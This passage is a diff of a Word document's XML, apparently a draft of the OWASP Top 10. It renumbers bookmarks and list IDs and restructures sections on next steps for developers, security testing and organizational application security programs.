-      <w:bookmarkStart w:id="127" w:name="example-scenarios-8"/>
-      <w:bookmarkEnd w:id="127"/>
+      <w:bookmarkStart w:id="140" w:name="example-scenarios-8"/>
+      <w:bookmarkEnd w:id="140"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -6983,8 +6811,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="128" w:name="references-9"/>
-      <w:bookmarkEnd w:id="128"/>
+      <w:bookmarkStart w:id="141" w:name="references-9"/>
+      <w:bookmarkEnd w:id="141"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -6993,8 +6821,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="129" w:name="owasp-8"/>
-      <w:bookmarkEnd w:id="129"/>
+      <w:bookmarkStart w:id="142" w:name="owasp-9"/>
+      <w:bookmarkEnd w:id="142"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -7003,7 +6831,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1039"/>
+          <w:numId w:val="1043"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -7020,7 +6848,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1039"/>
+          <w:numId w:val="1043"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -7037,7 +6865,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1039"/>
+          <w:numId w:val="1043"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -7054,7 +6882,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1039"/>
+          <w:numId w:val="1043"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -7071,8 +6899,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="130" w:name="external-7"/>
-      <w:bookmarkEnd w:id="130"/>
+      <w:bookmarkStart w:id="143" w:name="external-8"/>
+      <w:bookmarkEnd w:id="143"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -7082,33 +6910,27 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">CWE-223: Omission of Security-relevant Information (#5)</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">CWE-778: Insufficient Logging (#5)</w:t>
+        <w:t xml:space="preserve">TBA</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="131" w:name="t-whats-next-for-security-testing"/>
-      <w:bookmarkEnd w:id="131"/>
-      <w:r>
-        <w:t xml:space="preserve">+T what's Next for Security Testing</w:t>
+      <w:bookmarkStart w:id="144" w:name="d-whats-next-for-developers"/>
+      <w:bookmarkEnd w:id="144"/>
+      <w:r>
+        <w:t xml:space="preserve">+D What's Next for Developers</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="132" w:name="establish-conitinuous-application-security-testing"/>
-      <w:bookmarkEnd w:id="132"/>
-      <w:r>
-        <w:t xml:space="preserve">Establish Conitinuous Application Security Testing</w:t>
+      <w:bookmarkStart w:id="145" w:name="establish-use-repeatable-security-processes-and-standard-security-controls"/>
+      <w:bookmarkEnd w:id="145"/>
+      <w:r>
+        <w:t xml:space="preserve">Establish &amp; Use Repeatable Security Processes and Standard Security Controls</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7116,7 +6938,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Building code securely is important. But it’s critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere it was supposed to be. The goal of application security testing is to provide this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approaches and tools. So we strongly encourage you to put some thought into how you are going to focus on what’s important across your entire application portfolio, and do it cost-effectively.</w:t>
+        <w:t xml:space="preserve">Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be daunting.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7124,7 +6946,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern software development requires continuous application security testing across the entire software development lifecycle. Look to enhance existing development pipelines with security automation that doesn’t slow development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied by the size of your application portfolio.</w:t>
+        <w:t xml:space="preserve">To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced numerous free and open resources that you can use to address application security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications and APIs.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -7288,7 +7110,7 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Building strong and usable security controls is difficult. Using a set of standard security controls radically simplifies the development of secure applications and APIs. OWASP recommends the OWASP Enterprise Security API (ESAPI) project as a model for the security APIs needed to produce secure web applications and APIs. ESAPI provides a reference implementation in Java. Many popular frameworks come with standard security controls for authorization, validation, CSRF, etc.</w:t>
+              <w:t xml:space="preserve">Building strong and usable security controls is difficult. Using a set of standard security controls radically simplifies the development of secure applications and APIs. Many popular frameworks come with standard security controls for authorization, validation, CSRF, etc.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7389,7 +7211,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId133">
+            <w:hyperlink r:id="rId146">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7406,7 +7228,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId134">
+            <w:hyperlink r:id="rId147">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7420,7 +7242,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId135">
+            <w:hyperlink r:id="rId148">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7434,7 +7256,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId136">
+            <w:hyperlink r:id="rId149">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7448,7 +7270,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId137">
+            <w:hyperlink r:id="rId150">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7462,7 +7284,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId138">
+            <w:hyperlink r:id="rId151">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7476,7 +7298,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId139">
+            <w:hyperlink r:id="rId152">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7490,7 +7312,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId140">
+            <w:hyperlink r:id="rId153">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7539,7 +7361,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId141">
+      <w:hyperlink r:id="rId154">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7556,7 +7378,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId142">
+      <w:hyperlink r:id="rId155">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7570,7 +7392,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId143">
+      <w:hyperlink r:id="rId156">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7587,7 +7409,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId143">
+      <w:hyperlink r:id="rId156">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7603,8 +7425,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="144" w:name="t-whats-next-for-security-testing-1"/>
-      <w:bookmarkEnd w:id="144"/>
+      <w:bookmarkStart w:id="157" w:name="t-whats-next-for-security-testing"/>
+      <w:bookmarkEnd w:id="157"/>
       <w:r>
         <w:t xml:space="preserve">+T What's Next for Security Testing</w:t>
       </w:r>
@@ -7613,8 +7435,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="145" w:name="establish-continuous-application-security-testing"/>
-      <w:bookmarkEnd w:id="145"/>
+      <w:bookmarkStart w:id="158" w:name="establish-continuous-application-security-testing"/>
+      <w:bookmarkEnd w:id="158"/>
       <w:r>
         <w:t xml:space="preserve">Establish Continuous Application Security Testing</w:t>
       </w:r>
@@ -7806,8 +7628,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="146" w:name="o-whats-next-for-organizations"/>
-      <w:bookmarkEnd w:id="146"/>
+      <w:bookmarkStart w:id="159" w:name="o-whats-next-for-organizations"/>
+      <w:bookmarkEnd w:id="159"/>
       <w:r>
         <w:t xml:space="preserve">+O What's Next for Organizations</w:t>
       </w:r>
@@ -7816,8 +7638,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="147" w:name="start-your-application-security-program-now"/>
-      <w:bookmarkEnd w:id="147"/>
+      <w:bookmarkStart w:id="160" w:name="start-your-application-security-program-now"/>
+      <w:bookmarkEnd w:id="160"/>
       <w:r>
         <w:t xml:space="preserve">Start Your Application Security Program Now</w:t>
       </w:r>
@@ -7827,34 +7649,36 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish an effective capability for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization’s application security posture. It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner. Some of the key activities in effective application security programs include:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">| Activity | Description |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| --- | --- |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Get Started | * Establish an application security program and drive adoption.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1040"/>
+        <w:t xml:space="preserve">Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization’s application security posture. It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner. Some of the key activities in effective application security programs include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="161" w:name="get-started"/>
+      <w:bookmarkEnd w:id="161"/>
+      <w:r>
+        <w:t xml:space="preserve">Get Started</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1044"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish an application security program and drive adoption.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -7866,31 +7690,77 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Gain management approval and establish an application security awareness campaign for the entire IT organization.|</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Risk Based Portfolio Approach | * Identify and prioritize your application portfolio from an inherent risk perspective.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">*Create an application risk profiling model to measure and prioritize all your applications and APIs.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Gain management approval and establish an application security awareness campaign for the entire IT organization.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1044"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Document all your IT assets (e.g. applications) in a Configuration Management Database (CMDB).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="162" w:name="risk-based-portfolio-approach"/>
+      <w:bookmarkEnd w:id="162"/>
+      <w:r>
+        <w:t xml:space="preserve">Risk Based Portfolio Approach</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1045"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Identify the protection needs of your application portfolio from a business perspective. Add the results to your CMDB.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1045"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish a common risk rating model with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1045"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1045"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -7900,27 +7770,31 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1040"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Establish a common risk rating model with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk. |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Enable with a Strong Foundation | * Establish a set of focused policies and standards that provide an application security baseline for all development teams to adhere to.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1040"/>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="163" w:name="enable-with-a-strong-foundation"/>
+      <w:bookmarkEnd w:id="163"/>
+      <w:r>
+        <w:t xml:space="preserve">Enable with a Strong Foundation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1046"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish a set of focused policies and standards that provide an application security baseline for all development teams to adhere to.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1046"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -7932,50 +7806,88 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Establish an application security training curriculum that is required and targeted to different development roles and topics. |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Integrate Security into Existing Processes | Define and integrate secure implementation and verification activities into existing development and operational processes. Activities include Threat Modeling, Secure Design &amp; Review, Secure Coding &amp; Code Review, Penetration Testing, and Remediation.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Provide subject matter experts and support services for development and project teams to be successful. |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Provide Management Visibility | * Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1040"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. |</w:t>
+          <w:numId w:val="1046"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish an application security training curriculum that is required and targeted to different development roles and topics.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="164" w:name="integrate-security-into-existing-processes"/>
+      <w:bookmarkEnd w:id="164"/>
+      <w:r>
+        <w:t xml:space="preserve">Integrate Security into Existing Processes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1047"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Define and integrate secure implementation and verification activities into existing development and operational processes. Activities include threat modeling, secure design &amp; review, secure coding &amp; code review, penetration testing and remediation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1047"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Provide subject matter experts and support services for development and project teams to be successful.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="165" w:name="provide-management-visibility"/>
+      <w:bookmarkEnd w:id="165"/>
+      <w:r>
+        <w:t xml:space="preserve">Provide Management Visibility</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1048"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1048"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. Learn from mistakes and offer positive incentives to promote improvements.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="148" w:name="r-about-risks"/>
-      <w:bookmarkEnd w:id="148"/>
+      <w:bookmarkStart w:id="166" w:name="r-about-risks"/>
+      <w:bookmarkEnd w:id="166"/>
       <w:r>
         <w:t xml:space="preserve">+R About Risks</w:t>
       </w:r>
@@ -7984,8 +7896,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="149" w:name="defining-our-terms"/>
-      <w:bookmarkEnd w:id="149"/>
+      <w:bookmarkStart w:id="167" w:name="defining-our-terms"/>
+      <w:bookmarkEnd w:id="167"/>
       <w:r>
         <w:t xml:space="preserve">Defining our terms</w:t>
       </w:r>
@@ -8248,7 +8160,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1041"/>
+          <w:numId w:val="1049"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -8259,7 +8171,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1041"/>
+          <w:numId w:val="1049"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -8303,8 +8215,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="150" w:name="f-details-about-risk-factors"/>
-      <w:bookmarkEnd w:id="150"/>
+      <w:bookmarkStart w:id="168" w:name="f-details-about-risk-factors"/>
+      <w:bookmarkEnd w:id="168"/>
       <w:r>
         <w:t xml:space="preserve">+F Details about Risk factors</w:t>
       </w:r>
@@ -8313,8 +8225,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="151" w:name="top-10-risk-factor-summary"/>
-      <w:bookmarkEnd w:id="151"/>
+      <w:bookmarkStart w:id="169" w:name="top-10-risk-factor-summary"/>
+      <w:bookmarkEnd w:id="169"/>
       <w:r>
         <w:t xml:space="preserve">Top 10 Risk Factor Summary</w:t>
       </w:r>
@@ -9253,8 +9165,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="152" w:name="additional-risks-to-consider"/>
-      <w:bookmarkEnd w:id="152"/>
+      <w:bookmarkStart w:id="170" w:name="additional-risks-to-consider"/>
+      <w:bookmarkEnd w:id="170"/>
       <w:r>
         <w:t xml:space="preserve">Additional Risks To Consider</w:t>
       </w:r>
@@ -9271,7 +9183,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1042"/>
+          <w:numId w:val="1050"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9283,7 +9195,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1042"/>
+          <w:numId w:val="1050"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9319,7 +9231,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1043"/>
+          <w:numId w:val="1051"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9339,8 +9251,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="153" w:name="appendix-a-glossary"/>
-      <w:bookmarkEnd w:id="153"/>
+      <w:bookmarkStart w:id="171" w:name="appendix-a-glossary"/>
+      <w:bookmarkEnd w:id="171"/>
       <w:r>
         <w:t xml:space="preserve">Appendix A: Glossary</w:t>
       </w:r>
@@ -9349,7 +9261,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9370,7 +9282,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9391,7 +9303,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9412,7 +9324,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9433,7 +9345,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9454,7 +9366,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9475,7 +9387,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9496,7 +9408,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9517,7 +9429,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9538,7 +9450,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9559,7 +9471,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9580,7 +9492,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9601,7 +9513,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9622,7 +9534,7 @@
       <w:pPr>
